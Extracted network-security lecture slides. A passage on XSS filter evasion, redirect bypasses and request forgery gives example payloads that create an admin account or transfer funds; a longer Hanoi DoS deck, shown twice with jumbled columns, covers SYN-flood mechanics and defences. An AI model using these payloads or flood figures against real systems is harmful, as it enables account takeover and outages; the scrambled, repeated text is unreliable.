◼ Can remove certain expressions altogether, but then no longer check for
further vulnerabilities: <scr<script>ipt>
◼ Can be beaten by inserting NULL characters
◼ Escapes quotation characters with a backslash
❑ Use length filters that can be avoided by contracting JavaScripts
HTTP Only Cookies

◼ An application sets a cookie as http only


❑ Set-Cookie: SessId=124987389346541029:
HttpOnly
◼ Supporting browsers will not allow client side
scripts to access the cookie
◼ This dismantles one of the methods for
session hijacking
Cross-Site Tracing
◼ Enables client-side scripts to circumvent the
HttpOnly protection
❑ Uses HTTP TRACE method
◼ used for diagnostics
◼ enabled by many web servers by default
❑ If server receives a request using the TRACE method,
➔ respond with a message whose body contains exactly the
same text of the trace request received by the server.
◼ Purpose is to allow seeing changes made by proxies, etc.
❑ Browsers submit all cookies in HTTP requests
including requests that are made with TRACE and
including cookies that are HttpOnly
Attacking other users: XSS
◼ Redirection Attacks
❑ Applications takes user-controllable input for redirection
◼ Circumvention of typical protection mechanisms
❑ Application checks whether user-supplied string starts with http:// and
then blocks the redirection or removes http://
◼ Tricks of the trade:
❑ Capitalize some of the letters in http
❑ Start with a null character (%00)
❑ Use a leading space
❑ Use double http
◼ Similar tricks when application checks whether url is in the same site as
application
❑ Application adds prefix http://bobadilla.engr.scu.edu to user input
◼ This is vulnerable if the prefix does not end with a ‘/’ character
HTTP Header Injection

◼ Application inserts user-controllable data in


an HTTP header returned by application
❑ Can be used to inject cookies
❑ Can be used to poison proxy server cache
Attacking other users: XSS

◼ Request Forgery - Session Riding


◼ On-Site Request Forgery OSRF
❑ Payload for XSS
❑ Vulnerability profile: Site allows users to submit
items viewed by others, but XSS might not be
feasible.
Example
◼ Message Board Application
◼ Messages are submitted with a request such as
POST /submit.php
Host: bobadilla.engr.scu.edu
Content-Length: 41
type=question&name=foo&message=bar
◼ Request results in
<tr> <td><img src=“/images/question.gif”></td>
<td>foo</td>
<td>bar</td></tr>
◼ Now change your request type to
type=../admin/newUser.php?username=foo&password=bar&role=admin#
◼ Request results in
<tr> <td><img src=“/images/
=../admin/newUser.php?username=foo&password=bar&role=admin#.gif”></td>
<td> </td>
<td> </td></tr>
◼ When an administrator is induced to issue this crafter request, the action is
performed
Attacking other users: XSS
◼ XSS Request Forgery (XSRF)
◼ Attacker creates website
❑ User’s browser submits a request directly to a vulnerable
application
❑ HTTP cookies are used to transmit session tokens.

◼ 2004 (D. Amstrong): visitors make automatic bids to an ebay


auction
◼ Example:
❑ Find a function that performs some interesting action on behalf of
user and that has simple request parameters
POST TransferFunds.asp HTTP/1.1
Host: bobadilla.engr.scu.edu
FromAccount=current&ToSortCode=123456&ToAccountNumber=1234567&Amount=1000.
00&When=Now
❑ Create an HTML page that issues the request without any user
interaction
▪ For GET request, use an <img> tag with src set to the vulnerable URL
▪ For POST request, use a form with hidden forms
Denial of Service Attacks and
Solutions

Van Nguyen – HUT


Hanoi – 2010
Agenda

DOS Attack: Basic


Concepts SYN Flood Attack

Attack Source Detection


Traceback Solutions

Sep 2009
2
Denial-Of-Service

◼ Flooding-based
◼ Send packets to victims
❑ Network resources

❑ System resources

◼ Traditional DOS
❑ One attacker

◼ Distributed DOS
❑ Countless attackers
DDoS

◼ A typical DDoS attack consists of


❑ Stealing partial control of a large number of hosts
❑ Secretly manipulating them to send dummy packets to
jam a victim or/and its Internet connection

◼ Can be done in following ways:


❑ Exploiting system design weaknesses
◼ e.g. ping to death
❑ Imposing computationally intensive tasks on the
victim
◼ E.g. encryption and decryption
❑ Flooding based DDoS Attack.

4
Attacks Reported

◼ May/June, 1998
❑ First primitive DDoS tools developed in the
underground:
◼ Small networks, only mildly worse than coordinated point-
to-point DoS attacks.
◼ August 17, 1999
❑ Attack on the University of Minnesota reported to
UW network operations and security teams.
◼ February 2000
❑ Attack on Yahoo, eBay, Amazon.com and other
popular websites.
◼ Once, more than 12,000 attacks during a
three week period.
Reference: http://staff.washington.edu/dittrich/misc/ddos/timeline.html

5
DDoS Attacks

◼ Not necessarily rely on particular network


protocols or system design weaknesses

◼ A major threat because of:


❑ availability of a number of user-friendly attack
tools
❑ Lack of effective solutions to defend against them

◼ The attacks can be classified into


❑ Direct Attacks
❑ Reflector Attacks.

6
Direct Attacks

◼ A large number of packets sent directly towards


a victim.

◼ Source addresses are usually spoofed


❑ the response goes elsewhere (or no where)

◼ Examples:
❑ TCP-SYN Flooding: The last message of TCP’s 3 way
handshake never arrives from source.
❑ Congesting a victim using ICMP messages, RST packets
or UDP packets.
❑ Attack packet onserved: TCP packets (94%), UDP
packets (2%) and ICMP packets(2%).

7
Direct Attack

Figure 1.

Agent Programs: Trinoo, Tribe Flood Network 2000, and Stacheldraht

8
Reflector Attacks

◼ Uses innocent intermediary nodes (routers and servers)


known as reflectors.

◼ An attacker sends packets that require responses to the


reflectors with the packets’ inscribed source address set
to victim’s address.

◼ Can be done using TCP, UDP, ICMP as well as RST packets.

◼ Examples:
❑ Smurf Attacks: Attacker sends ICMP echo request to a
subnet directed broadcast address with the victim’s address
as the source address.
❑ SYN-ACK flooding: Reflectors respond with SYN-ACK
packets to victim’s address.

9
Reflector Attack

Figure 1.

◼ Cannot be observed by backscatter analysis, because victims do


not send back any packets.
◼ Packets cannot be filtered as they are legitimate packets.

10
DDoS Attack Architectures

11
Some Reflector Attack Methods

12
Solutions to the DDoS Problems

◼ There are three lines of defense against the


attack:
❑ Attack Prevention and Preemption (before the
attack)
❑ Attack Detection and Filtering (during the
attack)
❑ Attack Source Traceback and Identification
(during and after the attack)

◼ A comprehensive solution should include all


three lines of defense.
13
Attack Prevention and Preemption

◼ Protect hosts from master and agent implants:


❑ Using signatures and scanning procedures to detect
them.
❑ Monitor network traffic for known attack messages
sent between attackers and masters.

◼ Using cyber-spies to intercept attack plans (e.g.,


a group of cooperating agents).

◼ Inadequate, anyway.

14
Attack Source Traceback and Identification

◼ This is an act after-the-fact

◼ IP Traceback Identifying actual source of


packet without relying on source information.
❑ Deploy routers to help: can record information they
have seen.
◼ Routers can send additional information about seen packets to
their destinations.
◼ Sometime Infeasible to use IP Traceback:
❑ Cannot always trace packets’ origins. (NATs and
Firewalls!)
❑ Ineffective in reflector attacks.
❑ But helpful for post-attack law enforcement.

15
Attack Detection and Filtering

◼ Deployed in two phases:


❑ Attack Detection: identifying DDoS attack packets.
❑ Packet Filtering: classifying and dropping those packets .

◼ Effectiveness of Detection
❑ FPR (False Positive Ratio):
No. of false positives/Total number of confirmed normal
packets
❑ FNR (False Negative Ratio):
No. of false negatives/Total number of confirmed attack
packets

Both metrics should be low!

16
Attack Detection and Filtering

◼ Effectiveness of Filtering

❑ Effective attack detection DOES NOT IMPLY


Effective packet filtering
◼ Detection phase uses victim identities (Address or Port No.), so
even normal packets with same signatures can be dropped.

❑ NPSR (Normal Packet Survival Ratio):


Percentage of normal packets that can survive in
the midst of an attack ➔ NPSR should be high!

17
Attack Detection and Filtering

18
Attack Detection and Filtering
◼ At Source Networks:
❑ One can filter packets based on address spoofing
❑ Direct attacks can be traced easily, difficult reflector attacks
❑ Ensure all ISPs have ingress packet filtering
◼ Filter the spoofed address packets which’s source IPs do not belong to the
source network
◼ Very difficult to deploy this for all ISP (Impossible?)

◼ At the Victim’s Network:


❑ Victim can detect attack based on volume of incoming traffic or
degraded performance
◼ Commercial solutions available.
❑ Other mechanisms: IP Hopping
❑ Last Straw: If incoming link is jammed, victim has to shut down
and ask the upstream ISP to filter the packets.

19
Attack Detection and Filtering

◼ At a Victim’s Upstream ISP Network:


❑ Filter packets as asked by victim
❑ Can be automated by carefully designed intrusion alert systems
❑ Not a really good idea though
◼ Normal packets can still be dropped
◼ This upstream ISP network can still be jammed under large-scale attacks.

◼ At further Upstream ISP Networks:


❑ The above approach can be further extended to other
upstream networks.
❑ Effective only if ISP networks are willing to co-operate and
install packet filters.

20
An Internet Firewall

◼ A bipolar defense scheme cannot achieve both


effective packet detection and packet filtering.
➔ deploy a global defense infrastructure.
The plan is to detect attacks right at the Internet
core!

◼ Two methods, which employ a set of distributed


nodes in the Internet to perform attack detection
and packet filtering.
❑ Route-based Packet Filtering Approach (RPF)
❑ Distributed Attack Detection Approach (DAD)

21
Route-Based Packet Filtering (RPF)
◼ Extends the idea of ingress packet filtering
❑ Using distributed packet filters to examine the
packets, based on addresses and BGP routing
information.
◼ A packet is considered an attack packet if it comes from an
unexpected link.

◼ Major Drawbacks
❑ BGP messages to carry the needed source addresses
➔ Overhead!
❑ Deployment is extremely demanding
◼ Once thought: Filters were to be placed in 1800 out of 10,000 ASs
◼ # ASs is continuously increasing.
❑ Can’t work against reflected packets.
22
Distributed Attack Detection (DAD)
◼ The idea is to deploys multiple Distributed Detection
Systems (DSs) to observe network anomalies and
misuses.
❑ Anomaly detection: Identifying traffic patterns that
significantly deviate from normal
◼ e.g., unusual traffic intensity for specific packet types.
❑ Misuse detection: Identifying traffic that matches a known
attack signature.
◼ DSs to exchange attack information from local
observations
❑ Statefull in respect to the DDoS attacks.
◼ Still a challenging to ask for an effective and
deployable architecture

23
Distributed Attack Detection

DS Design Considerations

Other considerations:
• Filters should be installed only on attack
interfaces on ‘CONFIRMED’ state
• All DSs should be connected ‘always’
• Works in Progress:
Intrusion Detection Exchange Protocol
Tw o Hypotheses:
Intrusion Detection Message Exchange
H1 – Presence of a DDoS attack
Format
Each attack alert includes a
H0 – Null Hypothesis
‘confidence level’

24
SYN FLOOD DEFENSE
SOLUTIONS

25
TCP SYN-Flooding Attack

◼ TCP services are often susceptible to various types of


DoS attacks
❑ SYN flood: external hosts attempt to overwhelm the server
machine by sending a constant stream of TCP connection
requests
◼ Streaming spoofed TCP SYNs
◼ Forcing the server to allocate resources for each new connection until all
resources are exhausted
❑ 90% of DoS attacks use TCP SYN floods
❑ Takes advantage of three way handshake
◼ Server start “half-open” connections
◼ These build up… until queue is full and all additional requests are blocked
TCP: Overview RFCs: 793, 1122, 1323, 2018, 2581

◼ point-to-point: ◼ full duplex data:


❑ one sender, one receiver ❑ bi-directional data flow
◼ reliable, in-order byte in same connection
steam: ❑ MSS: maximum segment
❑ no “message boundaries” size

◼ pipelined: ◼ connection-oriented:
❑ TCP congestion and flow ❑ handshaking (exchange
control set window size of control msgs) init’s
sender, receiver state
◼ send & receive buffers before data exchange
◼ flow controlled:
❑ sender will not
socket
application
writes data
application
reads data
overwhelm receiver
socket
door door
TCP TCP
send buffer receive buffer
segment
TCP segment structure
32 bits
URG: urgent data counting
(generally not used) source port # dest port #
by bytes
sequence number of data
ACK: ACK #
valid acknowledgement number (not segments!)
head not
PSH: push data now len used
UA P R S F Receive window
(generally not used) # bytes
checksum Urg data pnter
rcvr willing
RST, SYN, FIN: to accept
Options (variable length)
connection estab
(setup, teardown
commands)
application
Internet data
checksum (variable length)
(as in UDP)
Attack Mechanism

◼ Transmission Control Block


(TCB) is reserved
◼ TCP SYN-RECEIVED state:
connection is half-opened
❑ Up on receiving SYN,
segment TCB
❑ Transited to ESTABLISHED
until last ACK
Attack Mechanism

◼ attacker sends a
flood of SYNs ➔ too
manyTCB ➔ host is
exhauted in memory.
◼ To avoid this, OS only
allows a fixed
maximum number of
TCBs in SYN-
RECEIVED
◼ If this threshold is
reached, new coming
SYN will be rejected
TCP Connection Management
Three way handshake:
Recall: TCP sender, receiver
Step 1: client host sends TCP
establish “connection”
SYN segment to server
before exchanging data
❑ specifies initial seq #
segments
◼ initialize TCP variables: ❑ no data

❑ seq. #s Step 2: server host receives


❑ buffers, flow control SYN, replies with SYNACK
info (e.g. RcvWindow) segment
◼ client: connection initiator ❑ server allocates buffers
◼ server: contacted by client ❑ specifies server initial seq.
#
Step 3: client receives SYNACK,
replies with ACK segment,
which may contain data
SYN Flooding

C S

SYNC1 Listening
SYNC2
Store data
SYNC3

SYNC4

SYNC5
Implementation Method
How to create a successful flood
◼ Making drops of incomplete connection (IC)
❑ Standard TCP: a connection times out only after some retranmisstion ➔ 511 sec
❑ Assuming 1024 ICs are allowed per socket➔ 2 connection attempts per second to
exhaust all allocated resources.
❑ Note that existing ICs are dropped when a new SYN request is received.
◼ If an ACK arrives at the server but does not find a corresponding
IC state ➔ the server fail to establish such required connection
❑ Round trip time (RTT): time required for the server to have the client reply
❑ Forcing the server to drop IC state at a rate larger than the RTT, ➔ no
connections are able to complete ➔ success in attack!
◼ The goal of attack is to recycle every connection before the average
RTT
❑ For a listen queue size of 1024, and a 100 millisecond RTT ➔ need 10,000 packets
per second.
❑ A minimal size TCP packet is 64 bytes, so the total bandwidth used is only
4Mb/second ➔ practical!

Sep 2010 Network Security by Van K Nguyen


34
Hanoi University of Technology
Firewall based Defense

◼ Examples: SYN Defender, SYN proxying


◼ Filters packets and requests before router
◼ Maintains state for each connection

◼ Drawbacks: can be overloaded, extra delay


for processing each packet
Server Based Defense
◼ Examples: SYN Cache, SYN cookies
◼ SYN cache:
❑ hash table, to partially store states,
❑ If the SYN-ACK is “acked” then the connection is
established with the server
◼ SYN cookies
❑ do not store states in server but in the network
◼ Using a cryptographic function to encode all information into a
value that is sent to the client with the SYN,ACK
◼ Upon receiving ACK, this value can be extracted then used as a
authentic proof of the source machine
SYN kill

◼ Monitors the network


❑ If detects SYNs that are not being acked ➔
automatically generates RST packets to free
resources,
◼ also it classifies addresses as likely to be spoofed or
legitimate…
Problems with previous solutions

◼ Solutions such as SYN cookies, SYN cache,


SYN Defender/SYN proxying, SYN kill
❑ Knew nothing of source
❑ Relied on “costly IP traceback”
❑ These solutions are “statefull” so they can be
overwhelmed by SYN attacks
◼ 14,000SYN/sec can overload
Flood Detection System (FDS)

◼ Stateless, simple, edge (leaf) routers


◼ Utilize SYN-FIN pair behavior
◼ Include (SYNACK - FIN) so client or server
◼ However, RST violates SYN-FIN behavior
◼ Placement: First/last mile leaf routers
❑ First mile – detect large DoS attacker
❑ Last mile – detect DDoS attacks that first mile
would miss
SYN – FIN Behavior
SYN – FIN Behavior

◼ Generally every SYN has a FIN


What to do about “RST”
◼ We can’t tell if RST is active or passive
◼ Consider 75% active
◼ Active represents a SYN passive does not
◼ Should balance out to be background noise

RED – SYN
BLUE- FIN
BLACK – RST
Statistical Attack Detection

◼ There are very many SYN’s necessary to


accomplish a DoS attack
◼ At least 500 SYN/sec

◼ 1400 SYN/sec can overwhelm firewall

◼ 300,000 SYNs necessary to shut down server


for 10 minutes
◼ So SYN-FIN ratio should be very skewed

during an attack
False Positive Possibilities

◼ Many new online users with long sessions


❑ More SYNs coming in than FINs
◼ A major server is down which would result
in 3 SYNs to a FIN
❑ Because clients would retransmit the SYN
CUSUM Algorithm

◼ Finding average number of FINs over a


time period, and looking for a time period
and testing for statistical homogeneity .
If there are significant changes to this,
then find when they changed.
Detection

◼ The algorithm will result in zero for all


normal activity and cumulatively track (i.e.
CUSUM = “cumulative sum”)
Detection
◼ The internet can be quite dynamic and too
complicated for a parametric estimation, so
we use sequential testing which requires much
less computation
◼ Two aspects of detection:
❑ 1) False alarm time: the time without attacks
between unique false alarms
❑ 2) Detection time: the detection delay after the
attack starts.

◼ The goal is to minimize the second and


maximize the first. However, the conflict and
require trade offs
Performance Trends SYN-FIN
SYN attack vs Normal operation
Sensitivity of Detection

◼ 500 SYN/sec are


required to shut down
a server

◼ It takes a last mile


FDS 20 seconds to
detect 500 SYN/sec • Once detected
DDoS attack SYN defender
could be used to
protect victim
Detection is able to

◼ Distinguish between attacks and background


noise
◼ Detect DDoS with last mile FDS
◼ Not effected by changes in overall traffic
◼ Detect attacks within seconds and implement
protection.
◼ Do you think this would always work?
◼ Can you think of any exceptions??
Đề kiểm tra giữa kỳ

1. Trình bày giao thức Bit-commimment sử dụng hàm băm


và cho biết ý nghĩa cụ thể của các giá trị ngẫu nhiên sử
dụng trong giao thức. Có thể cải tiến giao thức này để
thực hiện “phép tung đồng xu” công bằng giữa 2 người
kết nối trực tuyến như thế nào?
2. Thuật toán trao chuyển khóa Diffie-Hellman:
◼ Trình bày ý tưởng giải pháp

◼ Trình bày thuật toán với một ví dụ minh họa với q=23.

◼ Phân tích tấn công Man-in-the-middle và nêu giải pháp


phòng tránh

Sep 2010 Network Security by Van K Nguyen


52
Hanoi University of Technology
Detecting SYN-Flood
using Bloom Filters

SFD-BF
Idea

◼ Improving SFD: using Bloom Filter match FINs


against SYN with low error probability
❑ For each TCP packets we are interested in this 4-tuple:
(source and destination IP, source and destination Port) ➔
Matching FIN against SYNs on this 4-tuple
Hash Function

Input : x
• Output : H[x]
• Properties
– Each value of x maps to a value of H[x]
– Typically: Size of (x) >> Size of (H[x])
• Implementation
– Hash Function
XOR of bits, Shifting, rotates ..

Operating System
Concepts
Bloom-Filter (BF)

◼ Bloom Filter uses k hash functions

Operating System
Concepts
Bloom-Filter (BF)

Operating System
Concepts
Querying a Bloom Filter

Operating System
Concepts
Querying a Bloom Filter

Operating System
Concepts
Optimal Parameters of a Bloom filter

• n : number of Item to be stored


• k : number of hash functions
• m : the size of the bit-array
(memory)
• The false positive probability
f = (½)^k
• The optimal value of hash
functions, k,is:
k = ln2 × m/n = 0.693 × m/n

Operating System
Concepts
Counting Bloom Filters

◼ Extension: the array of m bits becomes the array of


m small counters.
❑ When insert or delete a value x from BF, we simply increase
or decrease the corresponding counter

Operating System
Concepts
Counting Bloom Filters

❑ For small false positive probability, usually set


m/n=16➔ FSP is at most 0,000459
❑ Also give counters of 8 bits.
❑ When the number of counters are being used >=
m/2 ➔ reset BF to improve for smaller FSP

Operating System
Concepts
SFD-Method

1- Classification of packets
2-Computing the # of SYN and FIN packets
going through
3-Using algorithm CUSUM to analyze the (SYN-
FIN) pair behaviour

Operating System
Concepts
SFD-BF Method

◼ Improvement on previous SFD:


❑ Compute the difference between #SYN and #FIN

when the packets are matched on the 4-tuple:


◼ When a SYN packet comes, determine the
corresponding 4-tuple and insert this into BF.
Increase the counter specified by this 4-tuple.
◼ When a FIN/RST packet comes: determines the
4-tuples and find it’s hash in BF to decrease the
corresponding counter
Result
Result
Intentional Dropping Scheme
for SYN Flooding Mitigation
Idea

❑ Normally, if it does not receive a SYN-ACK after


sending a SYN for a certain time a client machine
then would resend another SYN until it gets
connected to the wanted server.
❑ The idea of this method is to drop all the first
SYN from all the source machine, which would help
to reduce SYN flood which is usually first SYNs
with spoofed addresses
Method

◼ The solution is to propose using 3 different BFs:


❑ BF1: stores the 4-tuple address of the first SYN

coming from a given source


❑ BF2: stores the 4-tupple of all SYNs, with which
the 3-way handshake is already completed
❑ BF-3: Store the 4-tupple of other SYNs.

Operating System
Concepts
Method

Once a SYN arrives, its 4-tuple address is checked


against the 3 BFs, where occurs 1 of the 3 following
cases:
◼ 1. Not in any BF➔ This is the first SYN then will
be dropped, also insert the 4-tuple into BF1
◼ 2. If found in BF-1➔ this is a second SYN we
just move the 4-tuple from BF1 to BF3
◼ 3. If in BF-2 ➔ Let it go through.

◼ 4. If in BF-3 ➔ let it goes through with


probability p=1/n, where n is the value of
corresponding counter in BF-3
Method

When an ACK comes, its 4-tupple address is checked


against the BFs, which may results in 1 of 3 following
cases”
1. Not in any BF ➔ drop the packet
2. If it matches one in BF-2 ➔ let it through
3. If in BF-3 ➔ the connection is completed ➔ move
the 4-tuple address from BF3 to BF-2
Result

◼ First SYN from any source will be dropped


◼ The second SYN from the same source will go
through
◼ If this same source continue sending SYNs, the
probability that the SYN numbered n is allowed
to go through is 1/n
➔ Thus, the SYN flood caused by an attacking
source will be mitigated.
Denial of Service Attacks and
Solutions

Van Nguyen – HUT


Hanoi – 2010
Agenda

DOS Attack: Basic


Concepts SYN Flood Attack

Attack Source Detection


Traceback Solutions

Sep 2009
2
Denial-Of-Service

◼ Flooding-based
◼ Send packets to victims
❑ Network resources

❑ System resources

◼ Traditional DOS
❑ One attacker

◼ Distributed DOS
❑ Countless attackers
DDoS

◼ A typical DDoS attack consists of


❑ Stealing partial control of a large number of hosts
❑ Secretly manipulating them to send dummy packets to
jam a victim or/and its Internet connection

◼ Can be done in following ways:


❑ Exploiting system design weaknesses
◼ e.g. ping to death
❑ Imposing computationally intensive tasks on the
victim
◼ E.g. encryption and decryption
❑ Flooding based DDoS Attack.

4
Attacks Reported

◼ May/June, 1998
❑ First primitive DDoS tools developed in the
underground:
◼ Small networks, only mildly worse than coordinated point-
to-point DoS attacks.
◼ August 17, 1999
❑ Attack on the University of Minnesota reported to
UW network operations and security teams.
◼ February 2000
❑ Attack on Yahoo, eBay, Amazon.com and other
popular websites.
◼ Once, more than 12,000 attacks during a
three week period.
Reference: http://staff.washington.edu/dittrich/misc/ddos/timeline.html

5
DDoS Attacks

◼ Not necessarily rely on particular network


protocols or system design weaknesses

◼ A major threat because of:


❑ availability of a number of user-friendly attack
tools
❑ Lack of effective solutions to defend against them

◼ The attacks can be classified into


❑ Direct Attacks
❑ Reflector Attacks.

6
Direct Attacks

◼ A large number of packets sent directly towards


a victim.

◼ Source addresses are usually spoofed


❑ the response goes elsewhere (or no where)

◼ Examples:
❑ TCP-SYN Flooding: The last message of TCP’s 3 way
handshake never arrives from source.
❑ Congesting a victim using ICMP messages, RST packets
or UDP packets.
❑ Attack packet onserved: TCP packets (94%), UDP
packets (2%) and ICMP packets(2%).

7
Direct Attack

Figure 1.

Agent Programs: Trinoo, Tribe Flood Network 2000, and Stacheldraht

8
Reflector Attacks

◼ Uses innocent intermediary nodes (routers and servers)


known as reflectors.

◼ An attacker sends packets that require responses to the


reflectors with the packets’ inscribed source address set
to victim’s address.

◼ Can be done using TCP, UDP, ICMP as well as RST packets.

◼ Examples:
❑ Smurf Attacks: Attacker sends ICMP echo request to a
subnet directed broadcast address with the victim’s address
as the source address.
❑ SYN-ACK flooding: Reflectors respond with SYN-ACK
packets to victim’s address.

9
Reflector Attack

Figure 1.

◼ Cannot be observed by backscatter analysis, because victims do


not send back any packets.
◼ Packets cannot be filtered as they are legitimate packets.

10
DDoS Attack Architectures

11
Some Reflector Attack Methods

12
Solutions to the DDoS Problems

◼ There are three lines of defense against the


attack:
❑ Attack Prevention and Preemption (before the
attack)
❑ Attack Detection and Filtering (during the
attack)
❑ Attack Source Traceback and Identification
(during and after the attack)

◼ A comprehensive solution should include all


three lines of defense.
13
Attack Prevention and Preemption

◼ Protect hosts from master and agent implants:


❑ Using signatures and scanning procedures to detect
them.
❑ Monitor network traffic for known attack messages
sent between attackers and masters.

◼ Using cyber-spies to intercept attack plans (e.g.,


a group of cooperating agents).

◼ Inadequate, anyway.

14
Attack Source Traceback and Identification

◼ This is an act after-the-fact

◼ IP Traceback Identifying actual source of


packet without relying on source information.
❑ Deploy routers to help: can record information they
have seen.
◼ Routers can send additional information about seen packets to
their destinations.
◼ Sometime Infeasible to use IP Traceback:
❑ Cannot always trace packets’ origins. (NATs and
Firewalls!)
❑ Ineffective in reflector attacks.
❑ But helpful for post-attack law enforcement.

15
Attack Detection and Filtering

◼ Deployed in two phases:


❑ Attack Detection: identifying DDoS attack packets.
❑ Packet Filtering: classifying and dropping those packets .

◼ Effectiveness of Detection
❑ FPR (False Positive Ratio):
No. of false positives/Total number of confirmed normal
packets
❑ FNR (False Negative Ratio):
No. of false negatives/Total number of confirmed attack
packets

Both metrics should be low!

16
Attack Detection and Filtering

◼ Effectiveness of Filtering

❑ Effective attack detection DOES NOT IMPLY


Effective packet filtering
◼ Detection phase uses victim identities (Address or Port No.), so
even normal packets with same signatures can be dropped.

❑ NPSR (Normal Packet Survival Ratio):


Percentage of normal packets that can survive in
the midst of an attack ➔ NPSR should be high!

17
Attack Detection and Filtering

18
Attack Detection and Filtering
◼ At Source Networks:
❑ One can filter packets based on address spoofing
❑ Direct attacks can be traced easily, difficult reflector attacks
❑ Ensure all ISPs have ingress packet filtering
◼ Filter the spoofed address packets which’s source IPs do not belong to the
source network
◼ Very difficult to deploy this for all ISP (Impossible?)

◼ At the Victim’s Network:


❑ Victim can detect attack based on volume of incoming traffic or
degraded performance
◼ Commercial solutions available.
❑ Other mechanisms: IP Hopping
❑ Last Straw: If incoming link is jammed, victim has to shut down
and ask the upstream ISP to filter the packets.

19
Attack Detection and Filtering

◼ At a Victim’s Upstream ISP Network:


❑ Filter packets as asked by victim
❑ Can be automated by carefully designed intrusion alert systems
❑ Not a really good idea though
◼ Normal packets can still be dropped
◼ This upstream ISP network can still be jammed under large-scale attacks.

◼ At further Upstream ISP Networks:


❑ The above approach can be further extended to other
upstream networks.
❑ Effective only if ISP networks are willing to co-operate and
install packet filters.

20
An Internet Firewall

◼ A bipolar defense scheme cannot achieve both


effective packet detection and packet filtering.
➔ deploy a global defense infrastructure.
The plan is to detect attacks right at the Internet
core!

◼ Two methods, which employ a set of distributed


nodes in the Internet to perform attack detection
and packet filtering.
❑ Route-based Packet Filtering Approach (RPF)
❑ Distributed Attack Detection Approach (DAD)

21
Route-Based Packet Filtering (RPF)
◼ Extends the idea of ingress packet filtering
❑ Using distributed packet filters to examine the
packets, based on addresses and BGP routing
information.
◼ A packet is considered an attack packet if it comes from an
unexpected link.

◼ Major Drawbacks
❑ BGP messages to carry the needed source addresses
➔ Overhead!
❑ Deployment is extremely demanding
◼ Once thought: Filters were to be placed in 1800 out of 10,000 ASs
◼ # ASs is continuously increasing.
❑ Can’t work against reflected packets.
22
Distributed Attack Detection (DAD)
◼ The idea is to deploys multiple Distributed Detection
Systems (DSs) to observe network anomalies and
misuses.
❑ Anomaly detection: Identifying traffic patterns that
significantly deviate from normal
◼ e.g., unusual traffic intensity for specific packet types.
❑ Misuse detection: Identifying traffic that matches a known
attack signature.
◼ DSs to exchange attack information from local
observations
❑ Statefull in respect to the DDoS attacks.
◼ Still a challenging to ask for an effective and
deployable architecture

23
Distributed Attack Detection

DS Design Considerations

Other considerations:
• Filters should be installed only on attack
interfaces on ‘CONFIRMED’ state
• All DSs should be connected ‘always’
• Works in Progress:
Intrusion Detection Exchange Protocol
Tw o Hypotheses:
Intrusion Detection Message Exchange
H1 – Presence of a DDoS attack
Format
Each attack alert includes a
H0 – Null Hypothesis
‘confidence level’

24
SYN FLOOD DEFENSE
SOLUTIONS

25
TCP SYN-Flooding Attack

◼ TCP services are often susceptible to various types of


DoS attacks
❑ SYN flood: external hosts attempt to overwhelm the server
machine by sending a constant stream of TCP connection
requests
◼ Streaming spoofed TCP SYNs
◼ Forcing the server to allocate resources for each new connection until all
resources are exhausted
❑ 90% of DoS attacks use TCP SYN floods
❑ Takes advantage of three way handshake
◼ Server start “half-open” connections
◼ These build up… until queue is full and all additional requests are blocked
TCP: Overview RFCs: 793, 1122, 1323, 2018, 2581

◼ point-to-point: ◼ full duplex data:


❑ one sender, one receiver ❑ bi-directional data flow
◼ reliable, in-order byte in same connection
stream: ❑ MSS: maximum segment
❑ no “message boundaries” size

◼ pipelined: ◼ connection-oriented:
❑ TCP congestion and flow ❑ handshaking (exchange
control set window size of control msgs) init’s
sender, receiver state
◼ send & receive buffers before data exchange
◼ flow controlled:
❑ sender will not
socket
application
writes data
application
reads data
overwhelm receiver
socket
door door
TCP TCP
send buffer receive buffer
segment
TCP segment structure
32 bits
URG: urgent data counting
(generally not used) source port # dest port #
by bytes
sequence number of data
ACK: ACK #
valid acknowledgement number (not segments!)
head not
PSH: push data now len used
UA P R S F Receive window
(generally not used) # bytes
checksum Urg data pnter
rcvr willing
RST, SYN, FIN: to accept
Options (variable length)
connection estab
(setup, teardown
commands)
application
Internet data
checksum (variable length)
(as in UDP)
Attack Mechanism

◼ Transmission Control Block


(TCB) is reserved
◼ TCP SYN-RECEIVED state:
connection is half-opened
❑ Up on receiving SYN,
segment TCB
❑ Transited to ESTABLISHED
until last ACK
Attack Mechanism

◼ attacker sends a
flood of SYNs ➔ too
manyTCB ➔ host is
exhauted in memory.
◼ To avoid this, OS only
allows a fixed
maximum number of
TCBs in SYN-
RECEIVED
◼ If this threshold is
reached, new coming
SYN will be rejected
TCP Connection Management
Three way handshake:
Recall: TCP sender, receiver
Step 1: client host sends TCP
establish “connection”
SYN segment to server
before exchanging data
❑ specifies initial seq #
segments
◼ initialize TCP variables: ❑ no data

❑ seq. #s Step 2: server host receives


❑ buffers, flow control SYN, replies with SYNACK
info (e.g. RcvWindow) segment
◼ client: connection initiator ❑ server allocates buffers
◼ server: contacted by client ❑ specifies server initial seq.
#
Step 3: client receives SYNACK,
replies with ACK segment,
which may contain data
SYN Flooding

C S

SYNC1 Listening
SYNC2
Store data
SYNC3

SYNC4

SYNC5
Implementation Method
How to create a successful flood
◼ Making drops of incomplete connection (IC)
❑ Standard TCP: a connection times out only after some retranmission ➔ 511 sec
❑ Assuming 1024 ICs are allowed per socket➔ 2 connection attempts per second to
exhaust all allocated resources.
❑ Note that existing ICs are dropped when a new SYN request is received.
◼ If an ACK arrives at the server but does not find a corresponding
IC state ➔ the server fail to establish such required connection
❑ Round trip time (RTT): time required for the server to have the client reply
❑ Forcing the server to drop IC state at a rate larger than the RTT, ➔ no
connections are able to complete ➔ success in attack!
◼ The goal of attack is to recycle every connection before the average
RTT
❑ For a listen queue size of 1024, and a 100 millisecond RTT ➔ need 10,000 packets
per second.
❑ A minimal size TCP packet is 64 bytes, so the total bandwidth used is only
4Mb/second ➔ practical!

Sep 2010 Network Security by Van K Nguyen


34
Hanoi University of Technology
Firewall based Defense

◼ Examples: SYN Defender, SYN proxying


◼ Filters packets and requests before router
◼ Maintains state for each connection

◼ Drawbacks: can be overloaded, extra delay


for processing each packet
Server Based Defense
◼ Examples: SYN Cache, SYN cookies
◼ SYN cache:
❑ hash table, to partially store states,
❑ If the SYN-ACK is “acked” then the connection is
established with the server
◼ SYN cookies
❑ do not store states in server but in the network
◼ Using a cryptographic function to encode all information into a
value that is sent to the client with the SYN,ACK
◼ Upon receiving ACK, this value can be extracted then used as a
authentic proof of the source machine
SYN kill

◼ Monitors the network


❑ If detects SYNs that are not being acked ➔
automatically generates RST packets to free
resources,
